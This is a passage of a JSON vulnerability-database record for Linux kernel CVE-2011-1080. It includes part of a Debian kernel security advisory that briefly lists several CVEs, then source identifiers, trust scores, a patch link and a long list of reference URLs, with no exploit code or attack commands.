Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nCVE-2011-1746\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian installations, this is exploitable\n    only by users in the video group. \n\nCVE-2011-1748\n\n    Oliver Kartkopp reported an issue in the Controller Area Network (CAN) raw\n    socket implementation which permits ocal users to cause a NULL pointer\n    dereference, resulting in a denial of service. \n    \nCVE-2011-1759\n\n    Dan Rosenberg reported an issue in the support for executing \"old ABI\"\n    binaries on ARM processors. \n\nCVE-2011-1767\n\n    Alexecy Dobriyan reported an issue in the GRE over IP implementation. \n\nCVE-2011-2022\n\n    Vasiliy Kulikov reported an issue in the Linux support for AGP devices. On default Debian\n    installations, this is exploitable only by users in the video group. \n\nThis update also includes changes queued for the next point release of\nDebian 6.0, which also fix various non-security issues. These additional\nchanges are described in the package changelog which can be viewed at:\n\n  http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog\n\nFor the stable distribution (squeeze), this problem has been fixed in version\n2.6.32-34squeeze1. Updates for issues impacting the oldstable distribution\n(lenny) will be available soon. \n\nThe following matrix lists additional source packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\n                                             Debian 6.0 (squeeze)\n     user-mode-linux                         2.6.32-1um-4+34squeeze1\n\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages. \n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niQIcBAEBAgAGBQJN3I4aAAoJEBv4PF5U/IZAaa4P/j+l40Mp6naHByZt3jpwNWSA\nRN/jkkrYnYNDyT7crB+/DOdu84zalYa2KqfffOd/faV9+NSCBayjJ5c+FvVgeTay\nIl8elfcWP/uK0BXJn2xVb7YAsLpIe0HRlhxe72ZqcT4Yxo1/IBnEpUS56JRd2tlA\nk7x7dbj+smlzlM4qiXQy1F6LNyDqoGDUKNohQHUoyQ5dGq/gdi3C7EnUs4Nx9vjK\nRU1HUWLXB4qm7JpoK6o3u6Hpe0ynZm74tYvTi0XhayGXGevaBvIQuEWqhY6gZF1P\nv6a5gvBQC2pRIQXAVUbAhjoXpuF5jahTgicLdJanDqLfhefQ3qV11Ahvui2lzZuT\niKbMVGzO/azPLzskH8YNBq6drFPX2ZqRsxGmrTdzEtLWnJCN6nBBe4kF6C3z5T1A\n1ez4/F+OhNl2wnimq3CxiyfXun9WWs6IlULpqsKgJjE4bItg5a8+zTYGjkhQxX+X\nfPzO1xZCtQK4i+59Ejs5FwIfps0fA0m8c1Z5bnIaj4Q+0X5sJt2kwws8yrQKoOH1\neKGOgRqM70rOnyW/TQtXDGnTC4+vCCv89UjZUpG+sxZtWUxeh8CL2scUyceTeSNC\nIS2+EgvilN+a3hQlYJH4YNshmQCtJDp7qMTLaXLHM9hoV1L383nbJV4AtrFlcsCO\nKRI5f0ds95H6TsEoTSmO\n=gx2x\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "101861"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "104250"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-1080",
        "trust": 2.3
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/03/01/10",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "51749",
        "trust": 0.9
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406",
        "trust": 0.6
      },
      {
        "db": "HITACHI",
        "id": "HS12-005",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "101861",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "109299",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106798",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105266",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105083",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "101680",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "104250",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "101861"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "104250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "id": "VAR-201206-0028",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.225
  },
  "last_update_date": "2024-07-04T21:55:06.733000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "linux-3.4.4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=43488"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-0833.html"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=681262"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/d846f71195d57b0bbb143382647c2c6638b04c5a"
      },
      {
        "trust": 1.6,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/03/01/10"
      },
      {
        "trust": 1.6,
        "url": "http://downloads.avaya.com/css/p8/documents/100145416"
      },
      {
        "trust": 1.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=d846f71195d57b0bbb143382647c2c6638b04c5a"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1078"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1080"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1079"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/51749"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1093"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1172"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0726"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1170"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1495"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1494"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1171"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1020"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1493"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1160"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1180"
      },
      {
        "trust": 0.3,
        "url": "http://www.hds.com/products/storage-software/hitachi-device-manager.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1163"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1577"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1166"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0711"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4649"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1573"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0695"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1044"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2484"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1581"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1585"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1771"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1833"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1478"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1598"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1593"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1173"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1745"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1746"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1090"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/kb/docs/doc-11259"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1170.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1163.html"
      },
      {
        "trust": 0.1,
        "url": "http://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/5/html/5.6_technical_notes/kernel.html#rhsa-2011-0833"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1763.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1577.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1494.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-0726.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1079.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1763"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1171.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1093.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1172.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1166.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1080.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1078.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1495.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2522"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1780"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2525"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1746"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2192"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1078"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1745"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1936"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/go/selfsupport-download"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2519"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009143"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1763"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2482"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1678"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2517"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1079"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009142"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1593"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2694"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3378"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2183"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1256-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2479"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1767"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1479"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1768"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1748"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1212-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.38-1209.15"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0463"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2022"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1770"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-fsl-imx51/2.6.31-610.28"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1013"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4162"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3859"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4163"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4242"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1010"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4076"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4077"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4805"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4175"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4668"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4251"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1204-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4160"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1082"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4243"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4158"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1012"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1476"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1477"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/changelogs/pool/main/l/linux-2.6/linux-2.6_2.6.32-34/changelog"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3875"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1189-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.24-29.93"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "101861"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "104250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "101861"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "106798"
      },
      {
        "db": "PACKETSTORM",
        "id": "105266"
      },
      {
        "db": "PACKETSTORM",
        "id": "105083"
      },
      {
        "db": "PACKETSTORM",
        "id": "101680"
      },
      {
        "db": "PACKETSTORM",
        "id": "104250"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201206-406"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-1080"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2011-06-01T03:46:58",
        "db": "PACKETSTORM",
        "id": "101861"
      },
      {
        "date": "2012-01-30T12:12:00",
        "db": "PACKETSTORM",
